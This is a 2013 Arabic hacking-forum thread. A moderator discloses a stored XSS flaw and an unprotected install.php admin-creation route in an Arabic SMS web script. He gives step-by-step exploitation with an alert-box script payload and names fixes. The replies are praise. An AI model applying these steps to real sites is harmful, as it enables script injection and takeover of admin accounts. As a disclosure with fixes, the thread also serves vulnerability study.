ثغرة في سكربت الجوال العربي من إكتشافي Xss & Add admin Vulnerability

ثغرات المواقع والسيرفرات وكيفية استغلالها وشروحات مع تطبيقات عملية على استغلال الثغرات وتطبيقها


إضافة رد
قديم 02-16-2013
  #1
r00t MoUkA
Moderator
 الصورة الرمزية r00t MoUkA
 
تاريخ التسجيل: Nov 2010
الدولة: etc / passwd
المشاركات: 650
شكراً: 211
تم شكره 157 مرة في 86 مشاركة
Talking ثغرة في سكربت الجوال العربي من إكتشافي Xss & Add admin Vulnerability



السلام عليكم ورحمة الله وبركاته

تم تحليل السكربت من بواسطتي

ووجدت فيه ثغرة المشهورة Xss

يعني كل واحد وكي يستعملها فأنا وضعت مثال بسيط فقط للإستغلال

معلومات حول السكربت من هنا

كود:
{ Titel   : سكربت الجوال العربي  www.saphp.com Xss & Add admin Vulnerability  }               
                                                                                                                                     
 { Version : 1.0 }                                                                                                            
                                                                                                                                     
 { Author  : Geniu Mouka }                                                                                            
                                                                                                                                     
 { Email   : [email protected] }                                                                                         
                                                                                                                                     
 { Site    : WwW.SoQoR.NeT }                                                                                       
                                                                                                                                     
                                                                                       





                                                                                                                                     
 Exemple :                                                                                                                    
                                                                                                                                     
 [~] Add New Sms localhost/sms/add.php?CatID=                                                        
                                                                                                                                     
                                                                                                                                     
 [~] Send NamE : Geniu Mouka                                                                                    
                                                                                                                                     
                                                                                                                                     
 [~] Write Message :<script>alert("Owend By Mouka")</script>                                    
                                                                                                                                     
                                                                                                                                     
 [~] And Go Index Page :)  localhost/sms/                                                                     
                                                                                                                                     
                                                                                                                                     
 [~] Close Exploit : http://php.net/manual/de/function.htmlspecialchars.php                
                                                                                                                                     
                   : http://php.net/manual/de/function.htmlentities.php                                 
                                                                                                                                     
 [~] And Add New Admin : http://localhost/sms/admin/install.php?step=2                    
                                                                                                                                     
                                                                                                                                     
 [~] Close Exploit : Delete Install.php
__________________
قال سفيان الثوري : ماعالجت شيئا أشدَ على نفسي منْ نِيَتِي
[#]

التعديل الأخير تم بواسطة r00t MoUkA ; 02-16-2013 الساعة 01:03 PM
r00t MoUkA غير متواجد حالياً  
رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ r00t MoUkA على المشاركة المفيدة:
قديم 02-19-2013
  #2
طائر العنقاء
فلسطين وطني
 الصورة الرمزية طائر العنقاء
 
تاريخ التسجيل: Apr 2008
الدولة: ||- أبحث عن وطني بين ركام الارض -||
العمر: 33
المشاركات: 3,648
شكراً: 437
تم شكره 623 مرة في 424 مشاركة
افتراضي رد: ثغرة في سكربت الجوال العربي من إكتشافي Xss & Add admin Vulnerability

راااااااااااائع ومبدع يا موكا وتالق غير منقطع النظير كما اعرفك
__________________

أنا لا أكره الناس ... ولا أسطو على أحد




ولكني إذا ما جعت ... آكل لحم مغتصبي

حذاري من جوعي ومن غضبي

All Things Are Difficult Before They Are Easy

ραℓєѕтιηє ρнσєηιχ


طائر العنقاء غير متواجد حالياً  
رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ طائر العنقاء على المشاركة المفيدة:
r00t MoUkA (02-19-2013)
قديم 11-22-2014
  #3
Cwne
Administrator
 الصورة الرمزية Cwne
 
تاريخ التسجيل: Mar 2004
الدولة: Palestine
المشاركات: 424
شكراً: 275
تم شكره 94 مرة في 83 مشاركة
افتراضي رد: ثغرة في سكربت الجوال العربي من إكتشافي Xss & Add admin Vulnerability

دائماً مبدع ومتألق . استمر
__________________
!! لآ تتعلم لتخترق ~ إخترق لتتعلم !!
Cwne غير متواجد حالياً  
رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ Cwne على المشاركة المفيدة:
r00t MoUkA (05-19-2016)
إضافة رد

مواقع النشر (المفضلة)

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
ثغرة في سكربت Joomla Component com_ircmbasic ¥ŁĮĿŌ¥ اختراق المواقع والسيرفرات 2 03-16-2010 07:24 PM
ثغرة في سكربت Joomla خطيرة جدا .. كل اصدارات جملة السابقة مصابة HACKERS PAL عالم الثغرات - Vulnerabilities World 37 03-03-2010 01:48 AM
استغلال ثغرة سكربت جومله ===****** Joomla HaCkEr SToOop عالم الثغرات - Vulnerabilities World 9 01-10-2010 09:17 AM
ثغرة سهلة جدا و خطيرة بتعطيك كلمة سر admin بلا عناء ولا وجع راس ولا برامج ولا.... killer_911 اختراق المواقع والسيرفرات 50 01-04-2009 10:53 AM
ثغرة في سكربت الدعم الفني Helpdesk software Hesk 0.92 HACKERS PAL عالم الثغرات - Vulnerabilities World 13 12-12-2008 09:07 PM


الساعة الآن 08:28 AM.